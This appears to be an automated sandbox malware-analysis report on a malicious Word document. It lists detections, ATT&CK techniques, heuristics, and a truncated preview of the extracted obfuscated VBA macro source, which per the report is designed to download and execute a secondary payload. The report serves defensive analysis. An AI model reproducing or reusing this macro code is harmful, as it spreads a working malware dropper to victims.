MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the macros.bas file. The GetObject and CallByName functions are often used in conjunction with VBA macros to execute arbitrary code. The ClamAV detection further confirms its malicious nature. The VBA code appears to be obfuscated, but its structure suggests it is designed to download and execute a secondary payload.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41166 bytes |
SHA-256: f1f35bca24c9cb1da20cbfb2149b6f964805a346f0d474d8fa48615570e8980c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "sub1, 0, 0, MSForms, Frame" Dim let2, let95(2) As Byte, let60(9) As Byte, let49(32) As Byte, let22(19) As Byte, let52(13) As Byte, let9(6) As Byte, let65(55) As Byte, let25(1269) As Byte, let63(5) As Byte, let10(38) As Byte, let75(38) As Byte, let62(1 To 255) As Byte Private Sub let29() let95(2) = let62(110) let95(0) = let62(17) let95(1) = let62(71) End Sub Private Function let99(let84) Dim let37(1) As Byte, let05, let61, let53 If let84 > (409020 / 1604) Then let05 = let7(let84, (-9458 + 9714)) let53 = let84 / (1694464 / 6619) let61 = let53 Else let05 = let84 End If let37(0) = let05 let37(1) = let61 let99 = let37 End Function Private Function let31(let34) On Error GoTo let98 Dim let50, let30 Do let30 = let34(let50) let50 = let50 + 1 Loop let98: let31 = let50 - 1 End Function Private Function let15(let94, let33, let5, let6, let3, let88) On Error GoTo let01 Set let15 = CallByName(let94, let33, let5, let3) let01: End Function Private Sub Sub1_Layout() If let2 = 0 Then let2 = 21 let41 End If End Sub Private Sub let04() let10(15) = let62(112) let10(26) = let62(7) let10(34) = let62(158) let10(36) = let62(90) let10(5) = let62(229) let10(16) = let62(226) let10(27) = let62(64) let10(20) = let62(207) let10(28) = let62(39) let10(8) = let62(88) let10(32) = let62(16) let10(7) = let62(171) let10(17) = let62(13) let10(37) = let62(162) let10(4) = let62(206) let10(38) = let62(172) let10(35) = let62(133) let10(12) = let62(113) let10(1) = let62(102) let10(2) = let62(43) let10(30) = let62(93) let10(11) = let62(106) let10(25) = let62(97) let10(9) = let62(157) let10(0) = let62(19) let10(6) = let62(53) let10(24) = let62(253) let10(19) = let62(153) let10(21) = let62(113) let10(29) = let62(65) let10(10) = let62(225) let10(14) = let62(150) let10(31) = let62(23) let10(23) = let62(47) let10(13) = let62(75) let10(3) = let62(100) let10(18) = let62(130) let10(33) = let62(191) End Sub Private Function let59(let42) Set let59 = GetObject(let42) End Function Private Function let86(let08() As Byte, let69() As Byte, let90) Dim let89, let92 On Error GoTo let91 let92 = 1 let89 = 0 While let89 <= let90 If let08(let89) <> let69(let89) Then let92 = 0 End If let89 = let89 + 1 Wend let86 = let92 Exit Function let91: let86 = 0 End Function Private Function let41() Dim let39, let68, let40, let83() As Byte, let24, let06 let06 = 1 While let06 <= (-2515 + 2770) let62(let06) = let06 let06 = let06 + 1 Wend let02 let04 let24 = (1522432 / 5947) let14 While let68 = 0 let83 = CStr(let39) let40 = let31(let83()) If let40 >= 1 Then let9(2) = let83(0) + (let83(1) * let24) If let40 >= 3 Then let9(3) = let83(2) + (let83(3) * let24) If let40 >= 5 Then let9(4) = let83(4) + (let83(5) * let24) If let40 >= 7 Then let9(5) = let83(6) + (let83(7) * let24) If let40 >= 9 Then let9(6) = let83(8) + (let83(9) * let24) End If End If End If End If End If If let86(let51(let10(), let77(let9()), 38), let75, 38) = 1 Then let68 = 3356 End If let39 = let39 + 1 Wend If let68 = 3356 Then let19 Else MsgBox let68 End If End Function Private Sub let96() let49(22) = let62(91) let49(13) = let62(83) let49(23) = let62(88) let49(21) = let62(93) let49(32) = let62(34) let49(0) = let62(33) let49(15) = let62(33) let49(7) = let62(236) let49(29) = let62(103) let49(6) = let62(112) let49(11) = let62(51) let49(1) = let62(75) let49(31) = let62(80) let49(10) = let62(205) let49(16) = let62(203) let49(20) = let62(218) let49(19) = let62(224) let49(27) = let62(10) let49(14) = let62(193) let49(12) = let62(52) let49(9) = let62(173) let49(2) = let62(116) let49(8) = let62(83) let49(5) = let62(186) let49(4) = let62(237) let49(24) = let62(139) let49(25) = let62(6) ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.